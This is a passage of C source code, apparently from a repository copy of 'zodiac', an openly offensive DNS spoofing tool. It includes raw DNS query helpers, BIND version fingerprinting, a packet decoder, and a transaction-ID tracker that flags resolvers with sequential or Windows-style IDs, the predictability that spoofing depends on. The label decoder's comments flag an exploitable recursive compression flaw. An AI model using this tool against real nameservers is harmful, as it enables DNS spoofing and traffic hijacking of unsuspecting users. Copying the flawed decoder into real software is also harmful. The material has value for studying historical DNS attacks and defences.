* retrieve a list of authority for a domain, from a particular nameserver
*
* return an allocated, null-terminated array of 'struct in_addr' on
* success
* return NULL on reror
* put error in 'int *err' if err != NULL
*/
struct in_addr *
dt_ns_get_auth (char *ns_query, char *domain, int *err)
{
struct in_addr *ns = NULL;
int ns_cnt = 0,
i;
dt_answer *ans;
dt_section *sect;
if (err) *err = DT_ANSWER_OK;
ans = dt_query_bind (ns_query, T_NS, C_IN, domain);
if (ans->answer != DT_ANSWER_OK) {
if (err != NULL) *err = ans->answer;
dt_answer_free (ans);
return NULL;
}
sect = &ans->an_section;
for (i = 0; i < sect->rrec_cnt; i++) {
rrec *rrec_ptr,
*ptr;
struct in_addr tmp;
rrec_ptr = &sect->rrecords[i];
if (rrec_ptr->type != T_NS)
continue;
/* try and find the relevant A record in the ar section */
ptr = dt_search_sect (&ans->ar_section,
T_A, rrec_ptr->data.label);
if (ptr == NULL) {
/* this iz kinda ugly */
tmp.s_addr = net_resolve (rrec_ptr->data.label);
if (tmp.s_addr == htonl(INADDR_ANY)) /* hmm */
continue;
} else {
tmp.s_addr = ptr->data.ip.s_addr;
}
++ns_cnt;
ns = (struct in_addr *)
xrealloc (ns, sizeof(struct in_addr) * ns_cnt);
ns[ns_cnt - 1].s_addr = tmp.s_addr;
}
dt_answer_free (ans);
if (ns_cnt == 0)
return (NULL);
/* null terminate it */
ns = (struct in_addr *)
xrealloc (ns, sizeof(struct in_addr) * ++ns_cnt);
ns[ns_cnt - 1].s_addr = 0;
return (ns);
}
/*
* Search for a resource record in a particular section.
*
* return a pointer to the relevant resource record on success.
* return NULL on error.
* -smiler
*/
static rrec
*dt_search_sect (dt_section *sect, u_short type, char *name)
{
rrec *record = NULL;
int i;
for (i = 0; i < sect->rrec_cnt; i++) {
if (sect->rrecords[i].type != type)
continue;
if (strcasecmp(name, sect->rrecords[i].name))
continue;
record = &sect->rrecords[i];
break; /* so the function returns */
}
return (record);
}
/* dt_bind_version
*
* try to retrieve a version number from a dns server with the host name
* `host' which is running the bind named.
*
* this would be easily done using a fixed buffer and an udp socket, but
* we want to do it with style, oh yeah =) (in other words i didn't write
* this routines to lever me down to udp sockets again ;)
*
* return an allocated string with the server response
* return an allocated string "unknown" if the version couldn't be retrieved
* return NULL on failure (no response)
*
* changed to use dt_query_bind().... -smiler
*/
char *
dt_bind_version (char *host)
{
dt_answer *ans;
char tmp[256];
ans = dt_query_bind (host, T_TXT, C_CHAOS, "VERSION.BIND.");
if (ans->answer != DT_ANSWER_OK) {
dt_answer_free (ans);
return (NULL);
}
/* copy the label into a temporary buffer, free the answer struct,
* /then/ allocate space for the string. hopefully this will avoid
* fragmentation in the heap space...
*/
tmp[255] = 0;
strncpy (tmp, ans->an_section.rrecords[0].data.label, sizeof (tmp) - 1);
dt_answer_free (ans);
return (xstrdup (tmp));
}
/* dt_query_bind
*
* generic query function. query a remote nameserver `serv' for a query
* `query' of the type `type' and class `class'.
*
* return a pointer to a generic answer structure
* on failure ans->answer will be set appropiatly
*
* -smiler
*/
dt_answer *
dt_query_bind (char *serv, u_short type, u_short class, char *query)
{
extern struct in_addr localip;
char tmp[20],
localip_str[20];
dns_pdata *packet;
dq_packet *catch;
int desc,
cnt;
u_short sport,
dns_id;
struct in_addr servaddr;
struct timeval tv;
dt_answer *ans = xcalloc (1, sizeof (dt_answer));
switch (type) {
case T_A:
case T_PTR:
case T_NS:
case T_TXT:
break;
default:
ans->answer = DT_ANSWER_UNKNOWNTYPE;
return (ans);
}
servaddr.s_addr = net_resolve (serv);
if (servaddr.s_addr == htonl (INADDR_ANY)) {
ans->answer = DT_ANSWER_RESOLVE;
return (ans);
}
sport = (libnet_get_prand (PRu16) % (65534 - 1024)) + 1025;
dns_id = libnet_get_prand (PRu16);
desc = dq_filter_install (
servaddr,
localip,
53,
sport,
1, dns_id, dns_id,
NULL);
if (desc == -1) {
ans->answer = DT_ANSWER_FILTERERR;
return (ans);
}
packet = dns_build_new ();
dns_build_q (packet, query, type, class);
net_printip (&servaddr, tmp, sizeof(tmp) - 1);
net_printip (&localip, localip_str, sizeof(localip_str) - 1);
dns_packet_send (localip_str, tmp, sport, 53,
dns_id, DF_RD, 1, 0, 0, 0, packet, 0);
dns_build_destroy (packet);
tv.tv_sec = 10;
tv.tv_usec = 0;
cnt = dq_filter_wait (desc, &tv);
if (cnt == 0) {
dq_filter_uninstall (desc);
ans->answer = DT_ANSWER_TIMEOUT;
return (ans);
}
catch = dq_p_get (desc);
dq_filter_uninstall (desc);
if (catch == NULL) {
ans->answer = DT_ANSWER_FILTERERR;
return (ans);
}
/* jump into helper function now :/ */
dt_process_pkt (ans, catch, type);
dq_p_free (catch);
return (ans);
}
/* dt_process_pkt
*
* helper function, parse the packet (a well known childrens party game).
*
* return in any case
*
* -smiler
*/
static void
dt_process_pkt (dt_answer *ans, dq_packet *pkt, u_short type)
{
u_short qdcount,
ancount,
nscount,
arcount;
int i,
sect;
unsigned char *ptr,
*dns_start;
ptr = pkt->packet;
ptr += (((ip_hdr *) ptr)->ip_hl) << 2;
ptr += UDP_H;
dns_start = ptr;
qdcount = ntohs (((HEADER *)ptr)->qdcount);
ancount = ntohs (((HEADER *)ptr)->ancount);
nscount = ntohs (((HEADER *)ptr)->nscount);
arcount = ntohs (((HEADER *)ptr)->arcount);
if (ancount == 0) {
ans->answer = DT_ANSWER_ERR;
return;
}
/* this should initialize the sections */
memset (&ans->an_section, '\0', sizeof (dt_section));
memset (&ans->ns_section, '\0', sizeof (dt_section));
memset (&ans->ar_section, '\0', sizeof (dt_section));
ptr += sizeof (HEADER);
/* skip question section */
while (qdcount-- > 0) {
ptr += dns_labellen (ptr);
ptr += 4;
}
sect = DT_SECT_AN;
for (i = 0; i < (ancount + nscount + arcount); i++) {
struct in_addr tmp;
u_short rdlength;
char label[256],
label2[256];
*label = *label2 = '\0';
if (i == ancount) {
sect++;
} else if (i == (ancount + nscount)) {
sect++;
}
dns_dcd_label (dns_start, &ptr, label, sizeof (label) - 1, 5);
GETSHORT (type, ptr);
ptr += 6;
GETSHORT (rdlength, ptr);
switch (type) {
case T_A:
tmp.s_addr = *(u_int32_t *) ptr;
dt_answer_add_A (ans, label, tmp, type, sect);
ptr += 4;
break;
case T_NS:
case T_PTR:
case T_TXT: /* RFC1035 SUCKS ASS! */
dns_dcd_label (dns_start, &ptr, label2, sizeof (label2) - 1, 5);
dt_answer_add_normal (ans, label, label2, type, sect);
break;
default:
break;
}
}
return;
}
static dt_section *
dt_choose_sect (dt_answer *ans, int sect)
{
dt_section *dt_sect = NULL;
switch (sect) {
case DT_SECT_AN:
dt_sect = &ans->an_section;
break;
case DT_SECT_NS:
dt_sect = &ans->ns_section;
break;
case DT_SECT_AR:
dt_sect = &ans->ar_section;
break;
}
return (dt_sect);
}
static void
dt_answer_add_A (dt_answer *ans, char *name, struct in_addr ip, u_short type, int sect)
{
int cnt;
rrec *ptr;
dt_section *dt_sect;
dt_sect = dt_choose_sect (ans, sect);
cnt = ++(dt_sect->rrec_cnt);
ptr = dt_sect->rrecords;
ptr = (rrec *) xrealloc (ptr, sizeof (rrec) * cnt);
ptr[cnt - 1].type = type;
ptr[cnt - 1].name = xstrdup (name);
ptr[cnt - 1].data.ip.s_addr = ip.s_addr;
dt_sect->rrecords = ptr;
return;
}
static void
dt_section_free (dt_section *dt_sect)
{
int i;
for (i = 0; i < dt_sect->rrec_cnt; ++i) {
rrec *ptr = &dt_sect->rrecords[i];
free(ptr->name);
switch (ptr->type) {
case T_A:
break;
case T_PTR:
case T_NS:
case T_TXT:
free (ptr->data.label);
break;
default:
break;
}
}
free (dt_sect->rrecords);
return;
}
/* dt_answer_free
*
* free a generic answer structure.
*
* return 0 on error
* return 1 on success
*/
int
dt_answer_free (dt_answer *ans)
{
if (ans == NULL)
return (0);
dt_section_free (&ans->an_section);
dt_section_free (&ans->ns_section);
dt_section_free (&ans->ar_section);
free(ans);
return (1);
}
static void
dt_answer_add_normal (dt_answer *ans, char *name, char *label, u_short type, int sect)
{
int cnt;
rrec *ptr;
dt_section *dt_sect;
dt_sect = dt_choose_sect (ans, sect);
cnt = ++(dt_sect->rrec_cnt);
ptr = dt_sect->rrecords;
ptr = (rrec *) xrealloc (ptr, sizeof (rrec) * cnt);
ptr[cnt - 1].type = type;
ptr[cnt - 1].name = xstrdup (name);
ptr[cnt - 1].data.label = xstrdup (label);
dt_sect->rrecords = ptr;
return;
}

View file

@ -0,0 +1,85 @@
/* zodiac - advanced dns spoofer
*
* by scut / teso, smiler
*
* dns tool routines include file
*/
#ifndef Z_DNSTOOLS_H
#define Z_DNSTOOLS_H
#define DT_ANSWER_OK 0x0
#define DT_ANSWER_TIMEOUT 0x1 /* no answer ! */
/* indicates a DNS error - should I be more specific? */
#define DT_ANSWER_ERR 0x2
#define DT_ANSWER_RESOLVE 0x3
#define DT_ANSWER_UNKNOWNTYPE 0x4
#define DT_ANSWER_FILTERERR 0x5
typedef struct {
char *name;
u_short type;
union {
struct in_addr ip; /* A */
char *label; /* PTR NS TXT */
} data;
} rrec;
typedef struct {
int rrec_cnt;
rrec *rrecords; /* array of resource records */
} dt_section;
typedef struct {
unsigned int answer; /* should be of form DT_ANSWER_* */
dt_section an_section,
ns_section,
ar_section;
} dt_answer;
/* dt_bind_version
*
* try to retrieve a version number from a dns server with the host name
* `host' which is running the bind named.
*
* this would be easily done using a fixed buffer and an udp socket, but
* we want to do it with style, oh yeah =) (in other words i didn't write
* this routines to lever me down to udp sockets again ;)
*
* return an allocated string with the server response
* return an allocated string "unknown" if the version couldn't be retrieved
* return NULL on failure (no response)
*/
char *dt_bind_version (char *host);
/* dt_query_bind
*
* generic query function. query a remote nameserver `serv' for a query
* `query' of the type `type' and class `class'.
*
* return a pointer to a generic answer structure
* on failure ans->answer will be set appropiatly
*
* -smiler
* we just don't *do* windoze NSs ;-)
*/
dt_answer *dt_query_bind (char *serv, u_short type, u_short class, char *query);
int dt_answer_free (dt_answer *ans);
/* Array of strings for DT_ANSWER_* macros.
*/
extern char *dterrlist[];
struct in_addr *dt_ns_get_auth (char *ns_query, char *domain, int *err);
#endif

548
dns/zodiac/src/dns.c Normal file
View file

@ -0,0 +1,548 @@
/* zodiac - advanced dns spoofer
*
* by scut / teso
*
* dns handling routines
*
* including scut's leet dns packet decoder *welp* :-D
*
*/
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <pthread.h>
#include <ncurses.h>
#include <stdlib.h>
#include <string.h>
#include "common.h"
#include "packet.h"
#include "dns.h"
#include "dnsid.h"
#include "dns-tag.h"
#include "dnsq.h"
#include "zodiac.h"
#include "output.h"
extern int quiteness;
pthread_mutex_t id_rmutex = PTHREAD_MUTEX_INITIALIZER;
static char *types[] = { NULL, "A", "NS", "MD", "MF", "CNAME", "SOA", "MB", "MG",
"MR", "NULL", "WKS", "PTR", "HINFO", "MINFO", "MX", "TXT" };
static char *rcodes[] = { "OK", "EFORM", "EFAIL", "ENAME", "ENIMP", "ERFSD", NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL };
/* dns_handle
*
* handle a dns packet with header pointed to by `dns_hdr' and data pointed
* to by `dns_data'.
*
* do all necessary queue / decoding stuff
*/
void
dns_handle (ip_hdr *ip, udp_hdr *udp, dns_hdr *dns, unsigned char *dns_data, unsigned int plen)
{
int n; /* temporary return value */
unsigned char *d_quer[SEG_COUNT_MAX]; /* query array */
unsigned char *d_answ[SEG_COUNT_MAX]; /* answer array */
unsigned char *d_auth[SEG_COUNT_MAX]; /* authority array */
unsigned char *d_addi[SEG_COUNT_MAX]; /* additional array */
char dns_p[2048]; /* output (for humans :) */
#ifdef PDEBUG
hexdump ("packet-dns", (unsigned char *) dns, 256);
#endif
/* segmentify dns packet
*/
n = dns_segmentify (dns, dns_data, d_quer, d_answ, d_auth, d_addi);
if (n != 0) {
m_printf (ms, ms->windns, "FAILURE ON DNS PACKET DISASSEMBLY\n");
return;
}
memset (dns_p, '\0', sizeof (dns_p));
/* only print own packets if dns_print_own_packets is 1
*/
if (dns_print_own_packets == 1 || dns_tag_check_n (&ip->ip_src,
&ip->ip_dst, htons (udp->uh_sport), htons (udp->uh_dport),
htons (dns->id)) == 0)
{
if (quiteness == 0) {
dns_printpkt (dns_p, sizeof (dns_p) - 1, ip, udp, dns,
dns_data, d_quer, d_answ, d_auth, d_addi);
}
}
/* do the real packet filtering stuff only if the packet isn't on the
* marked send queue :)
*/
if (dns_tag_check_n (&ip->ip_src, &ip->ip_dst, htons (udp->uh_sport),
htons (udp->uh_dport), htons (dns->id)) == 0)
{
dq_handle (ip, udp, dns, plen);
}
/* return
*/
return;
}
/* dns_p_print
*
* decode a dns packet pointed to by `dns' and `dns_data' to a human readable
* form to the string pointed to by `os', with a maximum length of `len'
*
* return 0 on success
* return 1 on failure
*/
int
dns_p_print (char *os, size_t len, dns_hdr *dns, unsigned char *d_quer[], unsigned char *d_answ[],
unsigned char *d_auth[], unsigned char *d_addi[])
{
int n;
scnprintf (os, len, "[%04x] ", ntohs (dns->id));
if (dns->qr == 0) {
/* print the query
*/
if (dns->opcode != 0 && dns->opcode != 1) {
scnprintf (os, len, "unsupported opcode %02x %s", dns->opcode,
(dns->opcode == 3) ? "ST " : "");
} else {
if (dns->opcode == 0)
scnprintf (os, len, " Q ");
else if (dns->opcode == 1)
scnprintf (os, len, "IQ ");
}
} else if (dns->qr == 1) {
char *rcstr = NULL;
/* authoritative answer ?
*/
if (dns->aa == 1)
scnprintf (os, len, "AA ");
else
scnprintf (os, len, " A ");
rcstr = rcodes[dns->rcode];
scnprintf (os, len, "(%s)", (rcstr == NULL) ? "?" : rcstr);
}
for (n = 0; n < ntohs (dns->qdcount) && n < SEG_COUNT_MAX; n++) {
if (n == 0)
scnprintf (os, len, "\n\t-QUERIES (%hu)-", ntohs (dns->qdcount));
scnprintf (os, len, "\n\t\t");
dns_p_q ((unsigned char *) dns, os, len, d_quer[n]);
}
for (n = 0; n < ntohs (dns->ancount) && n < SEG_COUNT_MAX; n++) {
if (n == 0)
scnprintf (os, len, "\n\t-ANSWERS (%hu)-", ntohs (dns->ancount));
scnprintf (os, len, "\n\t\t");
dns_p_rr ((unsigned char *) dns, os, len, d_answ[n]);
}
for (n = 0; n < ntohs (dns->nscount) && n < SEG_COUNT_MAX; n++) {
if (n == 0)
scnprintf (os, len, "\n\t-AUTHORITY (%hu)-", ntohs (dns->nscount));
scnprintf (os, len, "\n\t\t");
dns_p_rr ((unsigned char *) dns, os, len, d_auth[n]);
}
for (n = 0; n < ntohs (dns->arcount) && n < SEG_COUNT_MAX; n++) {
if (n == 0)
scnprintf (os, len, "\n\t-ADDITIONAL (%hu)-", ntohs (dns->arcount));
scnprintf (os, len, "\n\t\t");
dns_p_rr ((unsigned char *) dns, os, len, d_addi[n]);
}
return (0);
}
/* dns_p_q
*
* print a dns query record pointed to by `wp' as a human readable string,
* and append it to `os', which can have a maximum size of `len' characters.
*/
void
dns_p_q (unsigned char *dns_start, char *os, size_t len, unsigned char *wp)
{
char qname[256];
char *qt;
u_short qtype, qclass;
memset (qname, '\0', sizeof (qname));
dns_dcd_label (dns_start, &wp, qname, sizeof (qname) - 1, 5);
/* get query type and class
*/
GETSHORT (qtype, wp);
GETSHORT (qclass, wp);
if (qtype <= 16)
qt = types[qtype];
else
qt = NULL;
scnprintf (os, len, "[t: %s (%04x)][c: %04x] %s",
(qt != NULL) ? qt : "-", qtype, qclass, qname);
return;
}
/* dns_p_rdata
*
* print a resource record rdata field pointed to by `rdp' as a human readable
* string `rdstr' with a maximum length `len', depending on rdata type `rtype'
* the data pointed to by `rdp' has the length `rdlen'.
*
* return nothing
*/
void
dns_p_rdata (unsigned char *dns_start, char *rdstr, size_t len,
u_short rtype, unsigned char *rdp, u_short rdlen)
{
char *ips;
char ipv4str[64]; /* temporary IP address string */
struct in_addr ip;
unsigned char *wps = rdp;
memset (rdstr, '\0', len);
switch (rtype) {
case (T_A):
memcpy (&ip, rdp, sizeof (struct in_addr));
ips = ipv4_print (ipv4str, ip, 0);
scnprintf (rdstr, len, "%s", ips);
break;
case (T_CNAME):
case (T_NS):
case (T_PTR):
dns_dcd_label (dns_start, &wps, rdstr, len, 5);
break;
default:
break;
}
return;
}
/* dns_p_rr
*
* print a dns resource record pointed to by `wp' as a human readable string,
* and append it to `os', which can have a maximum size of `len' characters.
*/
void
dns_p_rr (unsigned char *dns_start, char *os, size_t len, unsigned char *wp)
{
char name[256], rdatas[256];
char *t;
u_short type, class, rdlen;
u_long ttl;
/* decode label
*/
memset (name, '\0', sizeof (name));
dns_dcd_label (dns_start, &wp, name, sizeof (name), 5);
/* get type/class/ttl/rdlength/rdata
* then assign appropiate type description
*/
GETSHORT (type, wp);
GETSHORT (class, wp);
GETLONG (ttl, wp);
GETSHORT (rdlen, wp);
t = (type <= 16) ? types[type] : NULL;
/* add decoded rdata info into rdatas
* different decoding depending on type
*/
dns_p_rdata (dns_start, rdatas, sizeof (rdatas), type, wp, rdlen);
scnprintf (os, len, "[t: %s (%04x)][c: %04x][ttl: %lu][r: %04x] %s : %s",
(t != NULL) ? t : "-", type, class, ttl, rdlen, name, rdatas);
return;
}
/* dns_segmentify
*
* segmentify a dns datagram pointed to by `dns_hdr' and `dns_data' into it's
* different parts, such as the query part (pointed to by `d_quer'), the
* answer part (pointed to by `d_answ'), the authoritaty (pointed to by
* `d_auth') and the additional information parts (pointed to by `d_addi').
*
* return 0 on success, and fill all the **-pointers to either NULL or data
* within the `dns_data' array.
*/
int
dns_segmentify (dns_hdr *dns, unsigned char *dns_data,
unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
unsigned char *d_addi[])
{
unsigned char *wp; /* work pointer */
wp = dns_data;
/* get queries, answers, authorities and additional information
*/
dns_seg_q (&wp, d_quer, htons (dns->qdcount), SEG_COUNT_MAX);
dns_seg_rr (&wp, d_answ, htons (dns->ancount), SEG_COUNT_MAX);
dns_seg_rr (&wp, d_auth, htons (dns->nscount), SEG_COUNT_MAX);
dns_seg_rr (&wp, d_addi, htons (dns->arcount), SEG_COUNT_MAX);
return (0);
}
/* dns_seg_q
*
* segmentify a query record of a dns datagram, starting at `wp', creating
* an array of `c' number of pointers in `d_arry', truncating if it exceeds
* a number of `max_size' records
*/
void
dns_seg_q (unsigned char **wp, unsigned char *d_arry[], int c, int max_size)
{
int count;
for (count = 0; count < c && count < max_size; count++) {
d_arry[count] = *wp;
*wp += dns_labellen (*wp); /* skip label */
*wp += 2 * sizeof (u_short); /* skip qtype/qclass */
}
}
/* dns_seg_rr
*
* segmentify a resource record of a dns datagram, starting at `wp', creating
* an array of `c' number of pointers in `d_arry', truncating if it exceeds
* a number of `max_size' records
*/
void
dns_seg_rr (unsigned char **wp, unsigned char *d_arry[], int c, int max_size)
{
int count;
unsigned long int rdlen;
for (count = 0; count < c && count < max_size; count++) {
d_arry[count] = *wp;
/* skip the label (most likely compressed)
*/
*wp += dns_labellen (*wp);
/* skip the type, class, ttl
*/
*wp += 8 * sizeof (u_char);
/* resource data length
*/
GETSHORT (rdlen, *wp);
*wp += rdlen;
}
return;
}
/* dns_labellen
*
* determine the length of a dns label pointed to by `wp'
*
* return the length of the label
*/
int
dns_labellen (unsigned char *wp)
{
unsigned char *wps = wp;
while (*wp != '\x00') {
/* in case the label is compressed we don't really care,
* but just skip it
*/
if ((*wp & INDIR_MASK) == INDIR_MASK) {
wp += sizeof (u_short);
/* non-clear RFC at this point, got to figure with some
* real dns packets
*/
return ((int) (wp - wps));
} else {
wp += (*wp + 1);
}
}
return ((int) (wp - wps) + 1);
}
/* dns_dcd_label
*
* decode a label sequence pointed to by `qname' to a string pointed to by
* `os', with a maximum length of `len' characters
* after successful decoding it will update *qname, to point to the qtype
* if the `dig' flag is > 0 the routine may allow to call itself recursively
* at a maximum dig level of `dig'.
* if `dig' is zero it is a recursive call and may not call itself once more.
* `dns_start' is a pointer to the beginning of the dns packet, to allow
* compressed labels to be decoded.
*
* return 0 on success
* return 1 on failure
*/
int
dns_dcd_label (unsigned char *dns_start, unsigned char **qname, char *os, size_t len, int dig)
{
unsigned char *qn = *qname;
while (*qn != '\0') {
if ((*qn & INDIR_MASK) == INDIR_MASK) {
int offset; /* compression offset */
unsigned char *tpt; /*temporary pointer */
if (dig == 0) {
if (dns_start == NULL)
return (1);
m_printf (ms, ms->windns, "DNS attack, compr. flaw exploit attempt\n");
return (1);
}
/* don't fuck with big bad endian
*/
offset = (((unsigned char) *qn) & ~0xc0) << 8;
qn += 1;
offset += (int) ((unsigned char) *qn);
qn += 1;
/* recursivly decode the label pointed to by the offset
* exploit here =)
*/
tpt = dns_start + offset;
*qname = qn;
return (dns_dcd_label (dns_start, &tpt, os, len, dig - 1));
} else {
char label[65];
memset (label, '\0', sizeof (label));
memcpy (label, qn + 1, (*qn & ~INDIR_MASK));
scnprintf (os, len, "%s", label);
}
qn += *qn + 1;
if (*qn != 0)
scnprintf (os, len, ".");
}
*qname = qn + 1;
return (0);
}
#if 0
/*
* My attempt at a version of dns_dcd_label that isn't recursive
* note this version doesn't check for errors yet....like
* nasty compressed dns packets which cause infinite loops :-(
* returns the length of the compressed domain name.
* -smiler
*/
int
dns_dcd_label (unsigned char *dns_start, unsigned char **qname, char *os, size_t len, int dig)
{
unsigned char *qn = *qname,
*start = qn,
*end = NULL;
unsigned char labellen;
unsigned short off;
while ((labellen = *qn++) != '\0') {
if (labellen & INDIR_MASK != 0) {
end = qn + 1;
off = (unsigned char) (labellen & ~INDIR_MASK);
off |= *qn++ << 8;
/* I think this works on big endian too... */
off = ntohs (off);
qn = dns_start + off;
continue;
}
memcpy (os, qn, labellen);
os += labellen;
qn += labellen;
*os++ = '.';
}
if (end == NULL)
end = qn;
*os++ = 0;
*qname = qn;
return (end - start);
}
#endif
/* dns_printpkt
*
* print dns packet header pointed to by `dns' in human readable form
* to dns window
*
* return nothing
*/
void
dns_printpkt (char *os, size_t osl, ip_hdr *ip, udp_hdr *udp, dns_hdr *dns, unsigned char *data,
unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
unsigned char *d_addi[])
{
char ipsrc[64], ipdst[64];
char *is, *id;
is = ipv4_print (ipsrc, ip->ip_src, 2);
id = ipv4_print (ipdst, ip->ip_dst, 2);
scnprintf (os, osl, "[%s:%5hu ->", is, ntohs (udp->uh_sport));
scnprintf (os, osl, " %s:%5hu] ", id, ntohs (udp->uh_dport));
/* print decoded dns packet to screen
*/
dns_p_print (os, osl, dns, d_quer, d_answ, d_auth, d_addi);
m_printf (ms, ms->windns, "%s\n", os);
return;
}

66
dns/zodiac/src/dns.h Normal file
View file

@ -0,0 +1,66 @@
/* zodiac - advanced dns spoofer
*
* by scut / teso
*
* dns / id queue handling routines
*/
#ifndef Z_DNS_H
#define Z_DNS_H
#include <sys/time.h>
#include <arpa/nameser.h>
#include <netinet/in.h>
#include <pthread.h>
#include "dnsid.h"
#include "output.h"
#include "packet.h"
/* dns flags (for use with libnet)
*/
#define DF_RESPONSE 0x8000
#define DF_OC_STD_Q 0x0000
#define DF_OC_INV_Q 0x0800
#define DF_OC_STAT 0x1800
#define DF_AA 0x0400
#define DF_TC 0x0200
#define DF_RD 0x0100
#define DF_RA 0x0080
#define DF_RCODE_FMT_E 0x0001
#define DF_RCODE_SRV_E 0x0002
#define DF_RCODE_NAME_E 0x0003
#define DF_RCODE_IMPL_E 0x0004
#define DF_RCODE_RFSD_E 0x0005
#define SEG_COUNT_MAX 16
void dns_handle (ip_hdr *ip, udp_hdr *udp, dns_hdr *dns, unsigned char *dns_data, unsigned int plen);
int dns_segmentify (dns_hdr *dns, unsigned char *dns_data,
unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
unsigned char *d_addi[]);
void dns_seg_q (unsigned char **wp, unsigned char *d_arry[], int c, int max_size);
void dns_seg_rr (unsigned char **wp, unsigned char *d_arry[], int c, int max_size);
int dns_labellen (unsigned char *wp);
/* dns_printpkt
*
* print a packet into the dns window
*/
void dns_printpkt (char *os, size_t osl, ip_hdr *ip, udp_hdr *udp, dns_hdr *dns, unsigned char *data,
unsigned char *d_quer[], unsigned char *d_answ[], unsigned char *d_auth[],
unsigned char *d_addi[]);
int dns_p_print (char *os, size_t len, dns_hdr *dns, unsigned char *d_quer[],
unsigned char *d_answ[], unsigned char *d_auth[], unsigned char *d_addi[]);
void dns_p_q (unsigned char *dns_start, char *os, size_t len, unsigned char *wp);
void dns_p_rr (unsigned char *dns_start, char *os, size_t len, unsigned char *wp);
void dns_p_rdata (unsigned char *dns_start, char *rdstr, size_t len, u_short rtype,
unsigned char *rdp, u_short rdlen);
int dns_dcd_label (unsigned char *dns_start, unsigned char **qname, char *os, size_t len, int dig);
#endif

403
dns/zodiac/src/dnsid.c Normal file
View file

@ -0,0 +1,403 @@
/* zodiac - advanced dns spoofer
*
* by scut / teso
*
* dns id queue handling routines
*
*/
#define DNSID_MAIN
#include <sys/time.h>
#include <unistd.h>
#include <pthread.h>
#include <ncurses.h>
#include <stdlib.h>
#include "common.h"
#include "dnsid.h"
#include "dns.h"
#include "network.h"
#include "zodiac.h"
#include "output.h"
id_q *id_root = NULL;
/* id_qprint
*
* erase the window pointed to by `win' in `screen', then print all
* ID's stored in queue pointed to by `root', which is protected by `rm'
*/
void
id_qprint (mscr *screen, WINDOW *win)
{
id_q *this; /* list step-through pointer */
/* clear window
*/
pthread_mutex_lock (&screen->outm);
werase (win);
pthread_mutex_unlock (&screen->outm);
pthread_mutex_lock (&id_rmutex);
this = id_root;
while (this != NULL) {
char ip[64], *ipp;
unsigned long int age = 0;
id_q *next;
pthread_mutex_lock (&this->id_mutex);
ipp = ipv4_print (ip, this->ip, 2); /* print ip in quad-dot, padded with spaces */
age = id_tdiff (&this->mtime); /* compute the age of the known id */
m_printfnr (screen, win, "[%s] %04x = %8lu %s%s\n", ipp, this->id, age,
((this->flags & IDF_SEQ) == IDF_SEQ) ? "SEQUENTIAL " : "",
((this->flags & IDF_WINDUMB) == IDF_WINDUMB) ? "WINDOWS" : "");
next = this->next;
pthread_mutex_unlock (&this->id_mutex);
this = next;
}
pthread_mutex_unlock (&id_rmutex);
pthread_mutex_lock (&screen->outm);
wrefresh (win);
pthread_mutex_unlock (&screen->outm);
return;
}
/* id_tdiff
*
* calculate the age in seconds from the given timeinterval and the current
* time.
*
* return the age in seconds
*/
unsigned long int
id_tdiff (struct timeval *mtime)
{
struct timeval current; /* current time */
/* get current time
*/
gettimeofday (&current, NULL);
return (tdiff (mtime, &current));
}
/* id_free
*
* free's an id_q structure, pointed to by `tofree'. this routine assumes that
* the calling function hold the `id_mutex', and won't unlock it later, because
* it gets destroyed.
*/
void
id_free (id_q *tofree)
{
pthread_mutex_destroy (&tofree->id_mutex);
free (tofree);
return;
}
/* id_seq
*
* make assumptions wether a dns id is predictable and used sequentially.
* use the time `o_time' of the old id `old_id' to compare with the new
* id `new_id'. use limit `idps' to get id rate per second.
*
* return 1 if it is sequentially (rate below or equal to `idps'
* return 0 if the id is not predictable or random (above the rate)
* return -1 if `old_id' is same as `new_id'
*/
int
id_seq (u_short new_id, u_short old_id, struct timeval *o_time, int idps)
{
unsigned long int age;
u_short id_diff = 0;
/* handle bigger/smaller cases signed, if equal it is most likely
* a second query approach, therefore id_diff stays zero
*/
if (new_id > old_id)
id_diff = (new_id - old_id);
else if (new_id < old_id)
id_diff = (old_id - new_id);
if (id_diff == 0)
return (-1);
/* make some calculations about predictability
* of the id's
*/
age = id_tdiff (o_time);
if (age == 0)
age = 1;
/* less then 10 id's per second
*/
if ((id_diff / age) <= idps)
return (1);
return (0);
}
/* id_windows
*
* check if both id's, `id_new' and `id_old' may be send out by a windows
* `operating system' dns resolver library.
*
* return 1 if it is most likely a windows box
* return 0 if it is most likely not a windows box
*/
int
id_windows (u_short id_new, u_short id_old)
{
if (id_new <= 20 && id_old <= 20)
return (1);
return (0);
}
/* id_add
*
* add/update a nameserver id entry for `ip' as the nameserver ip,
* `id' as the measured nameserver id, and `mtime' as the time measured.
*
* return nothing (since the packet is mutexed)
*/
void
id_add (struct in_addr ip, u_short id, struct timeval *mtime)
{
id_q *n_idq; /* new id queue element */
/* get memory for new linked list element
*/
n_idq = xcalloc (1, sizeof (id_q));
/* initialize structure
*/
pthread_mutex_init (&n_idq->id_mutex, NULL);
memcpy (&n_idq->ip, &ip, sizeof (struct in_addr));
n_idq->id = id;
n_idq->flags = 0;
memcpy (&n_idq->mtime, mtime, sizeof (struct timeval));
n_idq->next = NULL;
pthread_mutex_lock (&id_rmutex);
if (id_root == NULL) {
id_root = n_idq;
} else {
id_q *this, *last;
int bc = 0; /* for break condition */
/* step through the linked list until either an old entry
* was found, or we have reached the end of the list
* quite scuttish code ;-)
*
* fixed, optimized and rewritten 990614, please don't mod here
*/
last = this = id_root;
while (bc == 0) {
pthread_mutex_lock (&this->id_mutex);
/* if the id is already stored, unlink the old id_q,
* and put our one instead
*/
if (memcmp (&this->ip, &ip, sizeof (struct in_addr)) == 0) {
id_q *old;
int nr; /* temp. return value */
/* check wether the dns id is sequential
*/
nr = id_seq (id, this->id, &this->mtime, 40);
if (nr == -1) {
n_idq->flags = this->flags;
} else if (nr == 1) {
n_idq->flags |= IDF_SEQ;
} else if (nr == 0) {
/* n_idq->flags &= ~IDF_SEQ;
*/
n_idq->flags = this->flags;
}
nr = id_windows (id, this->id);
if (nr == 1)
n_idq->flags |= IDF_WINDUMB;
else
n_idq->flags &= ~IDF_WINDUMB;
/* if we have to replace the entry, we copy the link-
* data from it, then remove it from the linked list
*/
old = this;
n_idq->next = old->next;
/* if there were id_q's before, correct the last one
*/
